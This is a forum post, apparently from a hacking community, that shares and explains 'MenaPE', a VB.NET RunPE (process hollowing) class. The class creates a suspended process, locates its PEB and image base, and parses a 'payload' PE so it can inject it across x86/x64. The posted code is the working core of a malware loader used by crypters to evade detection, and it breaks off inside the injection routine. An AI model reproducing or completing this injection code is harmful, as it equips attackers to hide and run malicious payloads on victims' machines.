[font=Roboto, sans-serif]Yo. [/font]
[font=Roboto, sans-serif]So in this thread I will detail how to go about using Menalix's RunPE, called MenaPE. Here's a snippet of his description:[/font]
[font=Roboto, sans-serif]What I love about .NET is how we can manipulate with it in all kind of ways, due to the code is being JIT Compiled.[/font]
[font=Roboto, sans-serif]And this is kinda what this RunPE shows, normal RunPE’s can only do x86 -> x86 injections.[/font]
[font=Roboto, sans-serif]This RunPE can do ANY injection, yea even x86 -> x64 or x64 -> x86[/font]
[font=Roboto, sans-serif]Why? Well .NET is JIT Compiled, which means it isn’t really compiled yet when creating a .NET executeable,[/font]
[font=Roboto, sans-serif]a .NET executeable is like a wrapped executeable file with the instructions to how its gonna be JIT Compiled on run, so before its run we can manipulate just like we want with it.[/font]
[font=Roboto, sans-serif]Which means we can do RunPE Injections like x64 -> x86.[/font]
[font=Roboto, sans-serif]
[font=Roboto, sans-serif]So in this thread I will detail how to go about using Menalix's RunPE, called MenaPE. Here's a snippet of his description:[/font]
[font=Roboto, sans-serif]What I love about .NET is how we can manipulate with it in all kind of ways, due to the code is being JIT Compiled.[/font]
[font=Roboto, sans-serif]And this is kinda what this RunPE shows, normal RunPE’s can only do x86 -> x86 injections.[/font]
[font=Roboto, sans-serif]This RunPE can do ANY injection, yea even x86 -> x64 or x64 -> x86[/font]
[font=Roboto, sans-serif]Why? Well .NET is JIT Compiled, which means it isn’t really compiled yet when creating a .NET executeable,[/font]
[font=Roboto, sans-serif]a .NET executeable is like a wrapped executeable file with the instructions to how its gonna be JIT Compiled on run, so before its run we can manipulate just like we want with it.[/font]
[font=Roboto, sans-serif]Which means we can do RunPE Injections like x64 -> x86.[/font]
[font=Roboto, sans-serif]
So, How do we go about using this code?[/font]
Code:
Class MenaPE
Code:
Code:
Code:
[color=#a0a0a0][SIZE=3][font=Roboto, sans-serif][/font][/SIZE][/color]
[color=#a0a0a0][SIZE=3][font=Roboto, sans-serif] '------------------------------[/font][/SIZE][/color]
[color=#a0a0a0][SIZE=3][font=Roboto, sans-serif] 'Title: MenaPE (RunPE Class)[/font][/SIZE][/color]
[color=#a0a0a0][SIZE=3][font=Roboto, sans-serif] 'Author: Menalix[/font][/SIZE][/color]
[color=#a0a0a0][SIZE=3][font=Roboto, sans-serif] 'Website: Menalix.com[/font][/SIZE][/color]
[color=#a0a0a0][SIZE=3][font=Roboto, sans-serif] 'Notice: For teaching purposes[/font][/SIZE][/color]
[color=#a0a0a0][SIZE=3][font=Roboto, sans-serif] '------------------------------[/font][/SIZE][/color]
[color=#a0a0a0][SIZE=3][font=Roboto, sans-serif][/font][/SIZE][/color]
[color=#a0a0a0][SIZE=3][font=Roboto, sans-serif]#Region "Static API Calls"[/font][/SIZE][/color]
[color=#a0a0a0][SIZE=3][font=Roboto, sans-serif][/font][/SIZE][/color]
[color=#a0a0a0][SIZE=3][font=Roboto, sans-serif] Declare Function LoadLibraryA Lib "kernel32" (ByVal Name As String) As IntPtr[/font][/SIZE][/color]
[color=#a0a0a0][SIZE=3][font=Roboto, sans-serif] Declare Function GetProcAddress Lib "kernel32" (ByVal hProcess As IntPtr, ByVal Name As String) As IntPtr[/font][/SIZE][/color]
[color=#a0a0a0][SIZE=3][font=Roboto, sans-serif]#End Region[/font][/SIZE][/color]
[color=#a0a0a0][SIZE=3][font=Roboto, sans-serif][/font][/SIZE][/color]
[color=#a0a0a0][SIZE=3][font=Roboto, sans-serif]#Region "Dynamic API Caller"[/font][/SIZE][/color]
[color=#a0a0a0][SIZE=3][font=Roboto, sans-serif][/font][/SIZE][/color]
[color=#a0a0a0][SIZE=3][font=Roboto, sans-serif] Private Function CreateApi(Of T)(ByVal Name As String, ByVal Method As String) As T[/font][/SIZE][/color]
[color=#a0a0a0][SIZE=3][font=Roboto, sans-serif] Return DirectCast(DirectCast(Runtime.InteropServices.Marshal.GetDelegateForFunctionPointer(GetProcAddress(LoadLibraryA(Name), Method), GetType(T)), Object), T)[/font][/SIZE][/color]
[color=#a0a0a0][SIZE=3][font=Roboto, sans-serif] End Function[/font][/SIZE][/color]
[color=#a0a0a0][SIZE=3][font=Roboto, sans-serif][/font][/SIZE][/color]
[color=#a0a0a0][SIZE=3][font=Roboto, sans-serif]#End Region[/font][/SIZE][/color]
[color=#a0a0a0][SIZE=3][font=Roboto, sans-serif][/font][/SIZE][/color]
[color=#a0a0a0][SIZE=3][font=Roboto, sans-serif]#Region "Dynamic API's"[/font][/SIZE][/color]
[color=#a0a0a0][SIZE=3][font=Roboto, sans-serif][/font][/SIZE][/color]
[color=#a0a0a0][SIZE=3][font=Roboto, sans-serif] Private Delegate Function ReadProcessMemoryParameters(ByVal hProcess As UInteger, ByVal lpBaseAddress As IntPtr, ByRef lpBuffer As Integer, ByVal nSize As IntPtr, ByRef lpNumberOfBytesWritten As IntPtr) As Boolean[/font][/SIZE][/color]
[color=#a0a0a0][SIZE=3][font=Roboto, sans-serif] ReadOnly ReadProcessMemory As ReadProcessMemoryParameters = CreateApi(Of ReadProcessMemoryParameters)("kernel32", "ReadProcessMemory")[/font][/SIZE][/color]
[color=#a0a0a0][SIZE=3][font=Roboto, sans-serif][/font][/SIZE][/color]
[color=#a0a0a0][SIZE=3][font=Roboto, sans-serif] Private Delegate Function CreateProcessParameters( _[/font][/SIZE][/color]
[color=#a0a0a0][SIZE=3][font=Roboto, sans-serif] ByVal ApplicationName As String, _[/font][/SIZE][/color]
[color=#a0a0a0][SIZE=3][font=Roboto, sans-serif] ByVal CommandLine As String, _[/font][/SIZE][/color]
[color=#a0a0a0][SIZE=3][font=Roboto, sans-serif] ByVal ProcessAttributes As IntPtr, _[/font][/SIZE][/color]
[color=#a0a0a0][SIZE=3][font=Roboto, sans-serif] ByVal ThreadAttributes As IntPtr, _[/font][/SIZE][/color]
[color=#a0a0a0][SIZE=3][font=Roboto, sans-serif] ByVal InheritHandles As Boolean, _[/font][/SIZE][/color]
[color=#a0a0a0][SIZE=3][font=Roboto, sans-serif] ByVal CreationFlags As UInteger, _[/font][/SIZE][/color]
[color=#a0a0a0][SIZE=3][font=Roboto, sans-serif] ByVal Environment As IntPtr, _[/font][/SIZE][/color]
[color=#a0a0a0][SIZE=3][font=Roboto, sans-serif] ByVal CurrentDirectory As String, _[/font][/SIZE][/color]
[color=#a0a0a0][SIZE=3][font=Roboto, sans-serif] ByRef StartupInfo As STARTUPINFO, _[/font][/SIZE][/color]
[color=#a0a0a0][SIZE=3][font=Roboto, sans-serif] ByRef ProcessInformation As PROCESS_INFORMATION) As Boolean[/font][/SIZE][/color]
[color=#a0a0a0][SIZE=3][font=Roboto, sans-serif] Dim CreateProcess As CreateProcessParameters = CreateApi(Of CreateProcessParameters)("kernel32", "CreateProcessA")[/font][/SIZE][/color]
[color=#a0a0a0][SIZE=3][font=Roboto, sans-serif][/font][/SIZE][/color]
[color=#a0a0a0][SIZE=3][font=Roboto, sans-serif] Private Delegate Function NtQueryInformationProcessParameters(ByVal hProcess As IntPtr, _[/font][/SIZE][/color]
[color=#a0a0a0][SIZE=3][font=Roboto, sans-serif] ByVal ProcessInformationClass As Integer, _[/font][/SIZE][/color]
[color=#a0a0a0][SIZE=3][font=Roboto, sans-serif] ByRef ProcessInformation As PROCESS_BASIC_INFORMATION, _[/font][/SIZE][/color]
[color=#a0a0a0][SIZE=3][font=Roboto, sans-serif] ByVal ProcessInformationLength As UInteger, _[/font][/SIZE][/color]
[color=#a0a0a0][SIZE=3][font=Roboto, sans-serif] ByRef ReturnLength As UIntPtr) As UInteger[/font][/SIZE][/color]
[color=#a0a0a0][SIZE=3][font=Roboto, sans-serif] ReadOnly NtQueryInformationProcess As NtQueryInformationProcessParameters = CreateApi(Of NtQueryInformationProcessParameters)("ntdll", "NtQueryInformationProcess")[/font][/SIZE][/color]
[color=#a0a0a0][SIZE=3][font=Roboto, sans-serif][/font][/SIZE][/color]
[color=#a0a0a0][SIZE=3][font=Roboto, sans-serif] Private Delegate Function GetThreadContext64Parameters( _[/font][/SIZE][/color]
[color=#a0a0a0][SIZE=3][font=Roboto, sans-serif] ByVal hThread As IntPtr, _[/font][/SIZE][/color]
[color=#a0a0a0][SIZE=3][font=Roboto, sans-serif] ByRef lpContext As CONTEXT32) As Boolean[/font][/SIZE][/color]
[color=#a0a0a0][SIZE=3][font=Roboto, sans-serif] Dim GetThreadContext64 As GetThreadContext64Parameters = Nothing[/font][/SIZE][/color]
[color=#a0a0a0][SIZE=3][font=Roboto, sans-serif][/font][/SIZE][/color]
[color=#a0a0a0][SIZE=3][font=Roboto, sans-serif] Private Delegate Function IsWow64ProcessParameters( _[/font][/SIZE][/color]
[color=#a0a0a0][SIZE=3][font=Roboto, sans-serif] ByVal hProcess As IntPtr, _[/font][/SIZE][/color]
[color=#a0a0a0][SIZE=3][font=Roboto, sans-serif] ByRef Wow64Process As Boolean) As Boolean[/font][/SIZE][/color]
[color=#a0a0a0][SIZE=3][font=Roboto, sans-serif] ReadOnly IsWow64Process As IsWow64ProcessParameters = CreateApi(Of IsWow64ProcessParameters)("kernel32", "IsWow64Process")[/font][/SIZE][/color]
[color=#a0a0a0][SIZE=3][font=Roboto, sans-serif][/font][/SIZE][/color]
[color=#a0a0a0][SIZE=3][font=Roboto, sans-serif] Private Delegate Function WriteProcessMemoryParameters( _[/font][/SIZE][/color]
[color=#a0a0a0][SIZE=3][font=Roboto, sans-serif] ByVal hProcess As IntPtr, _[/font][/SIZE][/color]
[color=#a0a0a0][SIZE=3][font=Roboto, sans-serif] ByVal lpBaseAddress As IntPtr, _[/font][/SIZE][/color]
[color=#a0a0a0][SIZE=3][font=Roboto, sans-serif] ByVal lpBuffer As Byte(), _[/font][/SIZE][/color]
[color=#a0a0a0][SIZE=3][font=Roboto, sans-serif] ByVal nSize As UInteger, _[/font][/SIZE][/color]
[color=#a0a0a0][SIZE=3][font=Roboto, sans-serif] ByRef lpNumberOfBytesWritten As UInteger) As Boolean[/font][/SIZE][/color]
[color=#a0a0a0][SIZE=3][font=Roboto, sans-serif] ReadOnly WriteProcessMemory As WriteProcessMemoryParameters = CreateApi(Of WriteProcessMemoryParameters)("kernel32", "WriteProcessMemory")[/font][/SIZE][/color]
[color=#a0a0a0][SIZE=3][font=Roboto, sans-serif][/font][/SIZE][/color]
[color=#a0a0a0][SIZE=3][font=Roboto, sans-serif] Private Delegate Function NtUnmapViewOfSectionParameters( _[/font][/SIZE][/color]
[color=#a0a0a0][SIZE=3][font=Roboto, sans-serif] ByVal hProcess As IntPtr, _[/font][/SIZE][/color]
[color=#a0a0a0][SIZE=3][font=Roboto, sans-serif] ByVal pBaseAddress As IntPtr) As UInteger[/font][/SIZE][/color]
[color=#a0a0a0][SIZE=3][font=Roboto, sans-serif] ReadOnly NtUnmapViewOfSection As NtUnmapViewOfSectionParameters = CreateApi(Of NtUnmapViewOfSectionParameters)("ntdll", "NtUnmapViewOfSection")[/font][/SIZE][/color]
[color=#a0a0a0][SIZE=3][font=Roboto, sans-serif][/font][/SIZE][/color]
[color=#a0a0a0][SIZE=3][font=Roboto, sans-serif] Private Delegate Function VirtualAllocExParameters( _[/font][/SIZE][/color]
[color=#a0a0a0][SIZE=3][font=Roboto, sans-serif] ByVal hProcess As IntPtr, _[/font][/SIZE][/color]
[color=#a0a0a0][SIZE=3][font=Roboto, sans-serif] ByVal lpAddress As IntPtr, _[/font][/SIZE][/color]
[color=#a0a0a0][SIZE=3][font=Roboto, sans-serif] ByVal dwSize As UInteger, _[/font][/SIZE][/color]
[color=#a0a0a0][SIZE=3][font=Roboto, sans-serif] ByVal flAllocationType As UInteger, _[/font][/SIZE][/color]
[color=#a0a0a0][SIZE=3][font=Roboto, sans-serif] ByVal flProtect As UInteger) As IntPtr[/font][/SIZE][/color]
[color=#a0a0a0][SIZE=3][font=Roboto, sans-serif] ReadOnly VirtualAllocEx As VirtualAllocExParameters = CreateApi(Of VirtualAllocExParameters)("kernel32", "VirtualAllocEx")[/font][/SIZE][/color]
[color=#a0a0a0][SIZE=3][font=Roboto, sans-serif][/font][/SIZE][/color]
[color=#a0a0a0][SIZE=3][font=Roboto, sans-serif] Private Delegate Function ResumeThreadParameters( _[/font][/SIZE][/color]
[color=#a0a0a0][SIZE=3][font=Roboto, sans-serif] ByVal hThread As IntPtr) As UInteger[/font][/SIZE][/color]
[color=#a0a0a0][SIZE=3][font=Roboto, sans-serif] ReadOnly ResumeThread As ResumeThreadParameters = CreateApi(Of ResumeThreadParameters)("kernel32", "ResumeThread")[/font][/SIZE][/color]
[color=#a0a0a0][SIZE=3][font=Roboto, sans-serif][/font][/SIZE][/color]
[color=#a0a0a0][SIZE=3][font=Roboto, sans-serif]#End Region[/font][/SIZE][/color]
[color=#a0a0a0][SIZE=3][font=Roboto, sans-serif][/font][/SIZE][/color]
[color=#a0a0a0][SIZE=3][font=Roboto, sans-serif]#Region "API Structures"[/font][/SIZE][/color]
[color=#a0a0a0][SIZE=3][font=Roboto, sans-serif] Private Structure PROCESS_INFORMATION[/font][/SIZE][/color]
[color=#a0a0a0][SIZE=3][font=Roboto, sans-serif] Public hProcess As IntPtr[/font][/SIZE][/color]
[color=#a0a0a0][SIZE=3][font=Roboto, sans-serif] Public hThread As IntPtr[/font][/SIZE][/color]
[color=#a0a0a0][SIZE=3][font=Roboto, sans-serif] Public dwProcessId As UInteger[/font][/SIZE][/color]
[color=#a0a0a0][SIZE=3][font=Roboto, sans-serif] Public dwThreadId As UInteger[/font][/SIZE][/color]
[color=#a0a0a0][SIZE=3][font=Roboto, sans-serif] End Structure[/font][/SIZE][/color]
[color=#a0a0a0][SIZE=3][font=Roboto, sans-serif] Private Structure STARTUPINFO[/font][/SIZE][/color]
[color=#a0a0a0][SIZE=3][font=Roboto, sans-serif] Public cb As UInteger[/font][/SIZE][/color]
[color=#a0a0a0][SIZE=3][font=Roboto, sans-serif] Public lpReserved As String[/font][/SIZE][/color]
[color=#a0a0a0][SIZE=3][font=Roboto, sans-serif] Public lpDesktop As String[/font][/SIZE][/color]
[color=#a0a0a0][SIZE=3][font=Roboto, sans-serif] Public lpTitle As String[/font][/SIZE][/color]
[color=#a0a0a0][SIZE=3][font=Roboto, sans-serif] <Runtime.InteropServices.MarshalAs(Runtime.InteropServices.UnmanagedType.ByValArray, SizeConst:=36)> _[/font][/SIZE][/color]
[color=#a0a0a0][SIZE=3][font=Roboto, sans-serif] Public Misc As Byte()[/font][/SIZE][/color]
[color=#a0a0a0][SIZE=3][font=Roboto, sans-serif] Public lpReserved2 As Byte[/font][/SIZE][/color]
[color=#a0a0a0][SIZE=3][font=Roboto, sans-serif] Public hStdInput As IntPtr[/font][/SIZE][/color]
[color=#a0a0a0][SIZE=3][font=Roboto, sans-serif] Public hStdOutput As IntPtr[/font][/SIZE][/color]
[color=#a0a0a0][SIZE=3][font=Roboto, sans-serif] Public hStdError As IntPtr[/font][/SIZE][/color]
[color=#a0a0a0][SIZE=3][font=Roboto, sans-serif] End Structure[/font][/SIZE][/color]
[color=#a0a0a0][SIZE=3][font=Roboto, sans-serif] Structure FLOATING_SAVE_AREA[/font][/SIZE][/color]
[color=#a0a0a0][SIZE=3][font=Roboto, sans-serif] Dim Control, Status, Tag, ErrorO, ErrorS, DataO, DataS As UInteger[/font][/SIZE][/color]
[color=#a0a0a0][SIZE=3][font=Roboto, sans-serif] <System.Runtime.InteropServices.MarshalAs(System.Runtime.InteropServices.UnmanagedType.ByValArray, SizeConst:=80)> Dim RegisterArea As Byte()[/font][/SIZE][/color]
[color=#a0a0a0][SIZE=3][font=Roboto, sans-serif] Dim State As UInteger[/font][/SIZE][/color]
[color=#a0a0a0][SIZE=3][font=Roboto, sans-serif] End Structure[/font][/SIZE][/color]
[color=#a0a0a0][SIZE=3][font=Roboto, sans-serif] Structure CONTEXT32[/font][/SIZE][/color]
[color=#a0a0a0][SIZE=3][font=Roboto, sans-serif] Dim ContextFlags, Dr0, Dr1, Dr2, Dr3, Dr6, Dr7 As UInteger[/font][/SIZE][/color]
[color=#a0a0a0][SIZE=3][font=Roboto, sans-serif] Dim FloatSave As FLOATING_SAVE_AREA[/font][/SIZE][/color]
[color=#a0a0a0][SIZE=3][font=Roboto, sans-serif] Dim SegGs, SegFs, SegEs, SegDs, Edi, Esi, Ebx, Edx, Ecx, Eax, Ebp, Eip, SegCs, EFlags, Esp, SegSs As UInteger[/font][/SIZE][/color]
[color=#a0a0a0][SIZE=3][font=Roboto, sans-serif] <System.Runtime.InteropServices.MarshalAs(System.Runtime.InteropServices.UnmanagedType.ByValArray, SizeConst:=512)> Dim ExtendedRegisters As Byte()[/font][/SIZE][/color]
[color=#a0a0a0][SIZE=3][font=Roboto, sans-serif] End Structure[/font][/SIZE][/color]
[color=#a0a0a0][SIZE=3][font=Roboto, sans-serif] Structure PROCESS_BASIC_INFORMATION[/font][/SIZE][/color]
[color=#a0a0a0][SIZE=3][font=Roboto, sans-serif] Public ExitStatus As IntPtr[/font][/SIZE][/color]
[color=#a0a0a0][SIZE=3][font=Roboto, sans-serif] Public PebBaseAddress As IntPtr[/font][/SIZE][/color]
[color=#a0a0a0][SIZE=3][font=Roboto, sans-serif] Public AffinityMask As IntPtr[/font][/SIZE][/color]
[color=#a0a0a0][SIZE=3][font=Roboto, sans-serif] Public BasePriority As IntPtr[/font][/SIZE][/color]
[color=#a0a0a0][SIZE=3][font=Roboto, sans-serif] Public UniqueProcessID As IntPtr[/font][/SIZE][/color]
[color=#a0a0a0][SIZE=3][font=Roboto, sans-serif] Public InheritedFromUniqueProcessId As IntPtr[/font][/SIZE][/color]
[color=#a0a0a0][SIZE=3][font=Roboto, sans-serif] End Structure[/font][/SIZE][/color]
[color=#a0a0a0][SIZE=3][font=Roboto, sans-serif]#End Region[/font][/SIZE][/color]
[color=#a0a0a0][SIZE=3][font=Roboto, sans-serif][/font][/SIZE][/color]
[color=#a0a0a0][SIZE=3][font=Roboto, sans-serif]#Region "Injection"[/font][/SIZE][/color]
[color=#a0a0a0][SIZE=3][font=Roboto, sans-serif][/font][/SIZE][/color]
[color=#a0a0a0][SIZE=3][font=Roboto, sans-serif] Public Function Run(ByVal path As String, ByVal payload As Byte(), ByVal creationflag As Integer) As Boolean[/font][/SIZE][/color]
[color=#a0a0a0][SIZE=3][font=Roboto, sans-serif] For I As Integer = 1 To 5[/font][/SIZE][/color]
[color=#a0a0a0][SIZE=3][font=Roboto, sans-serif] If HandleRun(path, payload, creationflag) Then Return True[/font][/SIZE][/color]
[color=#a0a0a0][SIZE=3][font=Roboto, sans-serif] Next[/font][/SIZE][/color]
[color=#a0a0a0][SIZE=3][font=Roboto, sans-serif] Return False[/font][/SIZE][/color]
[color=#a0a0a0][SIZE=3][font=Roboto, sans-serif] End Function[/font][/SIZE][/color]
[color=#a0a0a0][SIZE=3][font=Roboto, sans-serif][/font][/SIZE][/color]
[color=#a0a0a0][SIZE=3][font=Roboto, sans-serif] Private Function HandleRun(ByVal Path As String, ByVal payload As Byte(), ByVal creationflag As Integer) As Boolean[/font][/SIZE][/color]
[color=#a0a0a0][SIZE=3][font=Roboto, sans-serif] Dim ReadWrite As Integer = Nothing[/font][/SIZE][/color]
[color=#a0a0a0][SIZE=3][font=Roboto, sans-serif] Dim QuotedPath As String = String.Format("""{0}""", Path)[/font][/SIZE][/color]
[color=#a0a0a0][SIZE=3][font=Roboto, sans-serif][/font][/SIZE][/color]
[color=#a0a0a0][SIZE=3][font=Roboto, sans-serif] Dim SI As New STARTUPINFO[/font][/SIZE][/color]
[color=#a0a0a0][SIZE=3][font=Roboto, sans-serif] Dim PI As New PROCESS_INFORMATION[/font][/SIZE][/color]
[color=#a0a0a0][SIZE=3][font=Roboto, sans-serif][/font][/SIZE][/color]
[color=#a0a0a0][SIZE=3][font=Roboto, sans-serif] SI.cb = CUInt(Runtime.InteropServices.Marshal.SizeOf(GetType(STARTUPINFO))) 'Parses the size of the structure to the structure, so it retrieves the right size of data[/font][/SIZE][/color]
[color=#a0a0a0][SIZE=3][font=Roboto, sans-serif][/font][/SIZE][/color]
[color=#a0a0a0][SIZE=3][font=Roboto, sans-serif] Try[/font][/SIZE][/color]
[color=#a0a0a0][SIZE=3][font=Roboto, sans-serif] 'COMMENT: Creating a target process in suspended state, which makes it patch ready and we also retrieves its process information and startup information.[/font][/SIZE][/color]
[color=#a0a0a0][SIZE=3][font=Roboto, sans-serif] If Not CreateProcess(Path, QuotedPath, IntPtr.Zero, IntPtr.Zero, True, creationflag, IntPtr.Zero, IO.Directory.GetCurrentDirectory, SI, PI) Then Throw New Exception()[/font][/SIZE][/color]
[color=#a0a0a0][SIZE=3][font=Roboto, sans-serif][/font][/SIZE][/color]
[color=#a0a0a0][SIZE=3][font=Roboto, sans-serif] 'COMMENT: Defines some variables we need in the next process[/font][/SIZE][/color]
[color=#a0a0a0][SIZE=3][font=Roboto, sans-serif] Dim ProccessInfo As New PROCESS_BASIC_INFORMATION[/font][/SIZE][/color]
[color=#a0a0a0][SIZE=3][font=Roboto, sans-serif] Dim RetLength As UInteger[/font][/SIZE][/color]
[color=#a0a0a0][SIZE=3][font=Roboto, sans-serif] Dim Context = Nothing[/font][/SIZE][/color]
[color=#a0a0a0][SIZE=3][font=Roboto, sans-serif] Dim PEBAddress32 As Integer = Nothing[/font][/SIZE][/color]
[color=#a0a0a0][SIZE=3][font=Roboto, sans-serif] Dim PEBAddress64 As Int64 = Nothing[/font][/SIZE][/color]
[color=#a0a0a0][SIZE=3][font=Roboto, sans-serif] Dim TargetIs64 As Boolean = Nothing[/font][/SIZE][/color]
[color=#a0a0a0][SIZE=3][font=Roboto, sans-serif] Dim IsWow64Proc As Boolean = False[/font][/SIZE][/color]
[color=#a0a0a0][SIZE=3][font=Roboto, sans-serif][/font][/SIZE][/color]
[color=#a0a0a0][SIZE=3][font=Roboto, sans-serif] IsWow64Process(PI.hProcess, IsWow64Proc) 'COMMENT: Retrieves Boolean to know if target process is a 32bit process running in 32bit system, or a 32bit process running under WOW64 in a 64bit system.[/font][/SIZE][/color]
[color=#a0a0a0][SIZE=3][font=Roboto, sans-serif] If IsWow64Proc Or IntPtr.Size = 4 Then 'COMMENT: Checks the Boolean retrieved from before OR checks if our calling process is 32bit[/font][/SIZE][/color]
[color=#a0a0a0][SIZE=3][font=Roboto, sans-serif] Context = New CONTEXT32[/font][/SIZE][/color]
[color=#a0a0a0][SIZE=3][font=Roboto, sans-serif] Context.ContextFlags = &H1000002L 'COMMENT: Parses the context flag CONTEXT_AMD64(&H00100000L) + CONTEXT_INTEGER(0x00000002L) to tell that we want a structure of a 32bit process running under WOW64, you can see all context flags in winnt.h header file.[/font][/SIZE][/color]
[color=#a0a0a0][SIZE=3][font=Roboto, sans-serif] If IsWow64Proc AndAlso IntPtr.Size = 8 Then 'COMMENT: Checks if our own process is 64bit and the target process is 32bit in wow64[/font][/SIZE][/color]
[color=#a0a0a0][SIZE=3][font=Roboto, sans-serif] GetThreadContext64 = CreateApi(Of GetThreadContext64Parameters)("kernel32", "Wow64GetThreadContext") 'COMMENT: Retrieves a structure of information to retrieve the PEBAddress to later on know where we gonna use WriteProcessMemory to write our payload[/font][/SIZE][/color]
[color=#a0a0a0][SIZE=3][font=Roboto, sans-serif] If Not GetThreadContext64(PI.hThread, Context) Then Throw New Exception[/font][/SIZE][/color]
[color=#a0a0a0][SIZE=3][font=Roboto, sans-serif] Console.WriteLine(Context.Ebx)[/font][/SIZE][/color]
[color=#a0a0a0][SIZE=3][font=Roboto, sans-serif] PEBAddress32 = Context.Ebx[/font][/SIZE][/color]
[color=#a0a0a0][SIZE=3][font=Roboto, sans-serif] TargetIs64 = False[/font][/SIZE][/color]
[color=#a0a0a0][SIZE=3][font=Roboto, sans-serif] Else 'COMMENT: If our process is 32bit and the target process is 32bit we get here. [/font][/SIZE][/color]
[color=#a0a0a0][SIZE=3][font=Roboto, sans-serif] NtQueryInformationProcess(PI.hProcess, 0, ProccessInfo, Runtime.InteropServices.Marshal.SizeOf(ProccessInfo), RetLength) 'COMMENT: Retrieves a structure of information to retrieve the PEBAddress to later on know where we gonna use WriteProcessMemory to write our payload[/font][/SIZE][/color]
[color=#a0a0a0][SIZE=3][font=Roboto, sans-serif] PEBAddress32 = ProccessInfo.PebBaseAddress[/font][/SIZE][/color]
[color=#a0a0a0][SIZE=3][font=Roboto, sans-serif] TargetIs64 = False[/font][/SIZE][/color]
[color=#a0a0a0][SIZE=3][font=Roboto, sans-serif] End If[/font][/SIZE][/color]
[color=#a0a0a0][SIZE=3][font=Roboto, sans-serif] Else 'COMMENT: If our process is 64bit and the target process is 64bit we get here. [/font][/SIZE][/color]
[color=#a0a0a0][SIZE=3][font=Roboto, sans-serif] NtQueryInformationProcess(PI.hProcess, 0, ProccessInfo, Runtime.InteropServices.Marshal.SizeOf(ProccessInfo), RetLength) 'COMMENT: Retrieves a structure of information to retrieve the PEBAddress to later on know where we gonna use WriteProcessMemory to write our payload[/font][/SIZE][/color]
[color=#a0a0a0][SIZE=3][font=Roboto, sans-serif] PEBAddress64 = ProccessInfo.PebBaseAddress[/font][/SIZE][/color]
[color=#a0a0a0][SIZE=3][font=Roboto, sans-serif] TargetIs64 = True[/font][/SIZE][/color]
[color=#a0a0a0][SIZE=3][font=Roboto, sans-serif] End If[/font][/SIZE][/color]
[color=#a0a0a0][SIZE=3][font=Roboto, sans-serif][/font][/SIZE][/color]
[color=#a0a0a0][SIZE=3][font=Roboto, sans-serif][/font][/SIZE][/color]
[color=#a0a0a0][SIZE=3][font=Roboto, sans-serif] Dim BaseAddress As IntPtr[/font][/SIZE][/color]
[color=#a0a0a0][SIZE=3][font=Roboto, sans-serif] If TargetIs64 = True Then[/font][/SIZE][/color]
[color=#a0a0a0][SIZE=3][font=Roboto, sans-serif] ReadProcessMemory(PI.hProcess, PEBAddress64 + &H10, BaseAddress, 4, ReadWrite) 'COMMENT: Reads the BaseAddress of a 64bit Process, which is where the exe data starts[/font][/SIZE][/color]
[color=#a0a0a0][SIZE=3][font=Roboto, sans-serif] Else[/font][/SIZE][/color]
[color=#a0a0a0][SIZE=3][font=Roboto, sans-serif] ReadProcessMemory(PI.hProcess, PEBAddress32 + &H8, BaseAddress, 4, ReadWrite) 'COMMENT: Reads the BaseAddress of a 32bit Process, which is where the exe data starts[/font][/SIZE][/color]
[color=#a0a0a0][SIZE=3][font=Roboto, sans-serif] End If[/font][/SIZE][/color]
[color=#a0a0a0][SIZE=3][font=Roboto, sans-serif][/font][/SIZE][/color]
[color=#a0a0a0][SIZE=3][font=Roboto, sans-serif] Dim PayloadIs64 As Boolean = False[/font][/SIZE][/color]
[color=#a0a0a0][SIZE=3][font=Roboto, sans-serif] Dim dwPEHeaderAddress As Integer = BitConverter.ToInt32(payload, &H3C) 'COMMENT: Gets the PEHeader start address[/font][/SIZE][/color]
[color=#a0a0a0][SIZE=3][font=Roboto, sans-serif] Dim dwNetDirFlags As Integer = BitConverter.ToInt32(payload, dwPEHeaderAddress + &H398) 'COMMENT: Gets the .NET Header Flags value to determine if its a AnyCPU Compiled exe or not[/font][/SIZE][/color]
[color=#a0a0a0][SIZE=3][font=Roboto, sans-serif] Dim wMachine As Integer = BitConverter.ToInt16(payload, dwPEHeaderAddress + &H4) 'COMMENT: Gets the reads the Machine value[/font][/SIZE][/color]
[color=#a0a0a0][SIZE=3][font=Roboto, sans-serif][/font][/SIZE][/color]
[color=#a0a0a0][SIZE=3][font=Roboto, sans-serif] If wMachine = 8664 Then : PayloadIs64 = True 'Checks the Machine value to know if payload is 64bit or not"[/font][/SIZE][/color]
[color=#a0a0a0][SIZE=3][font=Roboto, sans-serif] Else : PayloadIs64 = False : End If[/font][/SIZE][/color]
[color=#a0a0a0][SIZE=3][font=Roboto, sans-serif][/font][/SIZE][/color]
[color=#a0a0a0][SIZE=3][font=Roboto, sans-serif] If PayloadIs64 = False Then[/font][/SIZE][/color]
[color=#a0a0a0][SIZE=3][font=Roboto, sans-serif] If dwNetDirFlags = &H3 Then 'To make sure we don't rewrite flags on a Payload which is already AnyCPU Compiled, it will only slow us down[/font][/SIZE][/color]
[color=#a0a0a0][SIZE=3][font=Roboto, sans-serif] Buffer.SetByte(payload, dwPEHeaderAddress + &H398, &H1) 'Replaces the .NET Header Flag on a 32bit compiled payload, to make it possible doing 32bit -> 64bit injection[/font][/SIZE][/color]
[color=#a0a0a0][SIZE=3][font=Roboto, sans-serif] End If[/font][/SIZE][/color]
[color=#a0a0a0][SIZE=3][font=Roboto, sans-serif] End If[/font][/SIZE][/color]
[color=#a0a0a0][SIZE=3][font=Roboto, sans-serif][/font][/SIZE][/color]
[color=#a0a0a0][SIZE=3][font=Roboto, sans-serif] Dim dwImageBase As Integer[/font][/SIZE][/color]
[color=#a0a0a0][SIZE=3][font=Roboto, sans-serif] If PayloadIs64 = True Then[/font][/SIZE][/color]
[color=#a0a0a0][SIZE=3][font=Roboto, sans-serif] dwImageBase = BitConverter.ToInt32(payload, dwPEHeaderAddress + &H30) 'Reads the ImageBase value of a 64bit payload, it's kind of unnessecary as ImageBase should always be: &H400000, this is the virtual addressstart location for our exe in its own memory space[/font][/SIZE][/color]
[color=#a0a0a0][SIZE=3][font=Roboto, sans-serif] Else[/font][/SIZE][/color]
[color=#a0a0a0][SIZE=3][font=Roboto, sans-serif] dwImageBase = BitConverter.ToInt32(payload, dwPEHeaderAddress + &H34) 'Reads the ImageBase value of a 32bit payload, it's kind of unnessecary as ImageBase should always be: &H400000, this is the virtual address start location for our exe in its own memory space[/font][/SIZE][/color]
[color=#a0a0a0][SIZE=3][font=Roboto, sans-serif] End If[/font][/SIZE][/color]
[color=#a0a0a0][SIZE=3][font=Roboto, sans-serif][/font][/SIZE][/color]
